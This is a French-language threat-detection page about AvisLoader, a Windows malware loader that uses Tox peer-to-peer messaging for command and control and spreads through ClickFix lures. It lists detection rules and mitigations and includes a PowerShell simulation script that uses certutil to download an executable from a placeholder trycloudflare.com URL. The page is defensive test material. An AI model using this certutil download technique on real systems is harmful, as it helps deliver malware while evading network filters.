AvisLoader émerge comme un chargeur de logiciels malveillants Windows résilient
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
AvisLoader est un chargeur de logiciels malveillants Windows récemment identifié qui utilise le réseau de messagerie peer-to-peer (P2P) Tox pour la communication de commande et de contrôle (C2). Cette approche décentralisée permet aux opérateurs de maintenir la connectivité et de déplacer les contrôleurs sans dépendre de domaines fixes ou de serveurs centralisés. Le logiciel malveillant est couramment distribué via des leurres d’ingénierie sociale ClickFix hébergés sur l’infrastructure de Cloudflare.
Enquête
Varonis Threat Labs a découvert le chargeur sur un serveur de staging exposé ainsi que son centre de commande et les outils associés. L’enquête a identifié un leurre ClickFix sur le thème de DocuSign qui incite les utilisateurs à exécuter des commandes pour récupérer des charges utiles via Cloudflare Quick Tunnels. L’analyse de l’exécutable a révélé une communication C2 basée sur Tox, une fonctionnalité de contournement UAC, et des modules conçus pour masquer les processus malveillants.
Atténuation
Les organisations devraient former les utilisateurs à reconnaître et à signaler les invitations à signer des documents qui leur demandent de coller des commandes dans les terminaux ou la boîte de dialogue Exécuter de Windows. Les équipes de sécurité doivent surveiller l’utilisation suspecte des Workers Cloudflare et des Quick Tunnels dans les leurres basés sur le web. La détection de trafic réseau peer-to-peer (P2P) inattendu et de modifications non autorisées des raccourcis du bureau peut également aider à réduire le risque.
Réponse
Lorsque l’activité AvisLoader est détectée, les équipes de sécurité devraient examiner la lignée de processus des shells de commande et des interpréteurs de scripts lancés après des visites de domaines suspects. Inspectez les points de terminaison pour les raccourcis modifiés, .backup fichiers, et l’artifact VLCAssistant . La télémétrie réseau devrait également être examinée pour un trafic de protocole Tox inhabituel provenant d’hôtes affectés.
Flux d’Attaque
Nous continuons de mettre à jour cette partie.
Détections
Exécutable suspect contenant uniquement des chiffres dans le nom (via cmdline)
Communication suspecte de domaine Trycloudflare (via dns)
Tentative suspecte d’exécution de Curl [MacOS] (via cmdline)
IOCs (HashSha256) à détecter : Découvrir AvisLoader : Un chargeur Windows conçu pour résister à un démantèlement
Détecter un trafic Tox ou peer-to-peer inattendu [Connexion réseau Windows]
Détection de l’exécution de code à distance via des shells de commande et Cloudflare Quick Tunnel [Création de processus Windows]
Exécution de simulation
-
Narration de l’attaque & Commandes : Un adversaire a obtenu un accès initial à une station de travail. Pour maintenir la persistance et télécharger leur charge utile modulaire secondaire, ils utilisent un Cloudflare Quick Tunnel pour contourner le filtrage de sortie. L’attaquant utilise
certutil.exe, un utilitaire Windows intégré, pour télécharger la charge utile depuishttps://malicious-tunnel-id.trycloudflare.com/payload.exe. Cette méthode est choisie parce quecertutilest un binaire de confiance et le trafic semble se diriger vers une infrastructure Cloudflare légitime, ce qui le rend moins susceptible d’être signalé par des filtres de réputation réseau basiques. -
Script de test de régression :
# Script de simulation pour déclencher la règle de détection. # Cela utilise certutil pour tenter un téléchargement depuis une adresse trycloudflare.com. $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] Simulation d'activité adversaire : Téléchargement depuis $targetUrl via certutil..." # La commande suivante est conçue pour déclencher les conditions 'selection_tunnel' ET 'selection_tools'. certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] Commande de simulation exécutée avec succès." } else { Write-Host "[-] Échec de la commande (Attendu si l'URL est inexistante, mais la télémétrie devrait toujours être générée)." } -
Commandes de nettoyage :
# Script de nettoyage pour supprimer la charge utile simulée et les artefacts locaux. $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] Nettoyé $tempFile" } else { Write-Host "[-] Aucun artefact trouvé à nettoyer." }